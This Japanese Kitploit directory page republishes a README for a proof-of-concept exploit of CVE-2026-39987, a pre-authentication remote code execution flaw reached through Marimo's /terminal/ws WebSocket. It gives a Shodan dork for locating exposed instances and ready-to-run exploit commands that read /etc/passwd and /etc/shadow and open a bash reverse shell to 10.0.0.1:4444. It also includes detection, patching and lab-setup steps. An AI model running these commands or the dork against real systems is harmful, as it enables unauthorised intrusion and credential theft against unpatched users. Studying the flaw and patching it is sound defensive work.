Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
marimo_CVE-2026-39987_RCE_PoC — CVE-2026-39987のPoC:Marimo 0.23.0未満におけるWebSocket経由の事前認証RCE(CVSS 9.3)。 | Kitploit
ツール/GitHubGitHub/fevar54/marimo_cve-2026-39987_rce_poc
偵察脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubfevar54/marimo_cve-2026-39987_rce_poc

marimo_CVE-2026-39987_RCE_PoC

CVE-2026-39987のPoC:Marimo 0.23.0未満におけるWebSocket経由の事前認証RCE(CVSS 9.3)。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
175ヶ月前未レビュー

CVE-2026-39987 - Marimo < 0.23.0 事前認証RCE(WebSocket)

⚠️ 法的警告 ⚠️

このスクリプトは教育目的および許可されたテスト専用です。 明示的な許可なくシステムに対してこのツールを不正に使用することは違法です。 著者はこの情報の悪用について一切の責任を負いません。

📋 説明

Marimo 0.23.0 より前のバージョンには、事前認証なしでリモートコード実行(RCE)が可能な重大な脆弱性が存在します。/terminal/ws エンドポイントは適切なアクセス制御を実装しておらず、認証されていない攻撃者がシステム上で完全な対話型シェルを取得できる可能性があります。

詳細情報
CVECVE-2026-39987
深刻度重大
CVSS スコア9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H)
タイプ事前認証リモートコード実行(RCE)
ベクターWebSocket(/terminal/ws)
影響を受ける製品Marimo < 0.23.0
パッチMarimo ≥ 0.23.0

🎯 影響

  • ✅ 認証なしでのリモートコマンド実行
  • ✅ 完全な対話型 PTY シェル
  • ✅ システムの完全な侵害
  • ✅ 機密データへのアクセス
  • ✅ ネットワーク内での横移動の可能性

🔍 識別

Shodan Dork

http.favicon.hash:-1864630356

text

フィンガープリント

  • Favicon ハッシュ: -1864630356
  • エンドポイントバージョン: /api/version

💀 エクスプロイト PoC

要件

root@kitploit:~
pip install websockets requests
基本的な使用方法
bash
python CVE-2026-39987_PoC.py http://victima.com:8080 "id"
例
bash
# システム情報を取得
python CVE-2026-39987_PoC.py http://target.com:8080 "id"
python CVE-2026-39987_PoC.py http://target.com:8080 "uname -a"
python CVE-2026-39987_PoC.py http://target.com:8080 "whoami"

# 機密ファイルを読み取る
python CVE-2026-39987_PoC.py http://target.com:8080 "cat /etc/passwd"
python CVE-2026-39987_PoC.py http://target.com:8080 "cat /etc/shadow"

# リバースシェル
python CVE-2026-39987_PoC.py http://target.com:8080 "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

# 対話型シェル
python CVE-2026-39987_PoC.py http://target.com:8080 "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"
🛡️ 検出(安全)
パッシブ検出スクリプト
bash
python detector.py -u http://target.com:8080
python detector.py -l urls.txt
Nuclei テンプレート
yaml
# marimo-cve-2026-39987.yaml
id: CVE-2026-39987

info:
  name: Marimo < 0.23.0 Pre-Auth RCE
  severity: critical
  # ... (完全なテンプレートは含まれています)
🔧 修復
緊急対応
公開されている場合はシステムをネットワークから切断する

Marimo が実行されているポートへのアクセスをブロックする

ログを確認して不審な活動がないか調べる

恒久対応
bash
# パッチ適用済みバージョンに更新
pip install --upgrade marimo>=0.23.0

# バージョンを確認
marimo --version

# 公開する場合は認証を設定
# 'marimo edit' をインターネットに直接公開しないでください

Docker(脆弱な環境)
bash
# テスト用に脆弱なバージョンを実行
docker run -p 8080:8080 marimo-team/marimo:0.22.0

# 脆弱性を確認
python CVE-2026-39987_detector.py http://localhost:8080

# エクスプロイト
python CVE-2026-39987_PoC.py http://localhost:8080 "id"

GitHub Security Advisory

NVD Entry

Pull Request #9098

Marimo Documentation

👥 クレジット
発見: [研究者名]

PoC 開発: [あなたの名前]

パッチ: Marimo Team

📜 ライセンス
このプロジェクトは教育目的のみです。このソフトウェアの使用は自己責任で行ってください。

⭐ この README が役に立った場合は、リポジトリにスターを付けることを検討してください。

⚠️ 覚えておいてください: 大きな力には大きな責任が伴います
ツールをダウンロード